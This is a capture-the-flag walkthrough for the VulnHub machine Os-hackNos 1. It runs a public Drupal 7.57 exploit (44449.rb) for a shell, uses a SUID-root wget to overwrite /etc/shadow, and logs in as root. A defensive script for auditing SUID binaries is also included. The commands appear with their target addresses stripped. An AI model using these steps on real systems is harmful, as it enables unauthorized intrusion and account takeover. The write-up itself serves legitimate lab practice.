Os-hackNos 1 walkthrough

Hello there! Today we will try to get root on the VulnHub machine named hackNos: Os-hackNos.

Let’s see the description. It’s an easy-to-intermediate difficulty machine, has 2 flags (user and root) and is based on a web application (that’s what I love).


Okay, let’s start. First of all we have to find the victim in our subnet. Its MAC address is 08:00:27:C2:A4:A8. We will use the netdiscover tool.

netdiscover -i eth0 -r

The IP address of our victim is Next step is to scan the machine and try to find open ports. As you can guess we are using nmap. So, let’s type…

nmap -p 1-65535 -T4 -A -v

Not much, but enough to continue the pentest. We have 2 open ports:

  • Port 22 – SSH, common for Linux
  • Port 80 – HTTP, the usual website port without SSL

We don’t have credentials to connect via SSH yet, so our target is HTTP. Let’s enumerate the directories of the website. DirB is very helpful for this.


Very interesting. We found Drupal CMS installed in the drupal/ directory. We also have robots.txt, so we can find other interesting files and directories. Let’s start with robots.txt.

curl | grep Disallow

Changelog.txt. Thank you, system administrator, for leaving this file. What’s a changelog? A changelog is a log or record of all notable changes made to a project; it usually includes changes such as bug fixes, new features, etc., and the current version of the application. So let’s check it out.

curl | more

Current Drupal version is 7.57 (2018-02-21). Pretty old. Maybe we can find an exploit for it? We will use searchsploit.

searchsploit drupal | grep 7.5

OK, we found 3 exploits related to our machine’s app, but 2 of them require authentication. That leaves the last one, 44449.rb, which can help us get a reverse shell. Let’s use it. Copy the exploit to our working directory, make it executable and run it.

cp /usr/share/exploitdb/exploits/php/webapps/44449.rb .
chmod +x 44449.rb

But when we tried to execute it, we got an error: cannot load such file -- highline/import (LoadError). It’s not a problem. We will fix it, just type…

gem install highline; gem install import

After all the gems are installed, we can run the exploit once again.

ruby 44449.rb

And we got a shell as www-data.

ifconfig; whoami; id

A common tool for checking a Linux host for misconfigurations is LinEnum.sh (you can easily google it). So let’s copy that file to our working directory, start a simple HTTP server and upload it to the victim to find something interesting.

To start a simple HTTP server, enter on your local machine:

php -S

Then, using wget, download LinEnum.sh from the local machine.


Let’s check if everything is OK. List the directory.


Our file was successfully uploaded to the victim. And one more interesting fact: the downloaded file is owned by root. Hmm, interesting. We will keep it in mind. But now let’s finish enumeration.


What can we see? There is only 1 user in the system, james, and he has administrative privileges. Also, /usr/bin/wget is SUID root. That’s why our file was saved as root.
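Seen from the administrator's side, this finding is easy to catch before anyone else does. The script below is an added example, not part of the original walkthrough: it sorts setuid-root binaries into expected, risky and unknown. The BASELINE and RISKY lists, the function names and the sample paths are constructed assumptions to adapt per distribution.

```shell
#!/bin/sh
# Added example (not from the original post): classify setuid-root binaries.
# BASELINE and RISKY are constructed lists; adapt them to your distribution.
BASELINE="passwd su sudo mount umount chsh chfn newgrp gpasswd"
RISKY="wget curl cp mv dd tee tar find vim nano"

# Print every setuid regular file owned by root under DIR (one filesystem only).
list_suid_root() {
    find "$1" -xdev -type f -user root -perm -4000 -print 2>/dev/null
}

# Return 0 if word $1 appears in the space-separated list $2.
in_list() {
    case " $2 " in
        *" $1 "*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read paths on stdin; print "RISKY|OK|REVIEW path" for each one.
classify_suid() {
    while IFS= read -r path; do
        name=${path##*/}
        if in_list "$name" "$RISKY"; then
            echo "RISKY $path"    # reads or writes files as root: remove the bit
        elif in_list "$name" "$BASELINE"; then
            echo "OK $path"       # expected setuid helper
        else
            echo "REVIEW $path"   # in neither list: check by hand
        fi
    done
}

# Constructed sample listing, shaped like list_suid_root output.
sample_listing() {
    printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/wget /opt/tools/backup
}

sample_listing | classify_suid
# On a live host:                     list_suid_root / | classify_suid
# Fix for a RISKY hit, run as root:   chmod u-s /usr/bin/wget
```

Running it from cron and alerting on any RISKY or REVIEW line turns a one-off check into a regression guard.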

What does it mean? It means that we can write and overwrite any file in the system, including … /etc/shadow, which holds all the users’ password hashes. So let’s change the james and root passwords. Go back to our local machine, copy /etc/shadow to our working directory and open it. Then copy the root line and paste it below. Change root to james. Save it and run the HTTP server.


I use Kali Linux on VirtualBox, so the common password for root is toor. I copied it to james, so the password for james became toor too. Now let’s upload it to the victim.

wget -O /etc/shadow

OK, the new file is in the system. Let’s try to connect as james.

ssh james@
james@ password: toor

And we are in. Good job. Let’s escalate privileges.

As you remember, we changed all the passwords, including root’s. So let’s log in as root.

sudo su

And we are root in the system. Congrats!)

The last thing we have to do is to get the flags!

cat /home/james/user.txt
cat /root/root.txt

That’s all. We did everything! See you soon 😉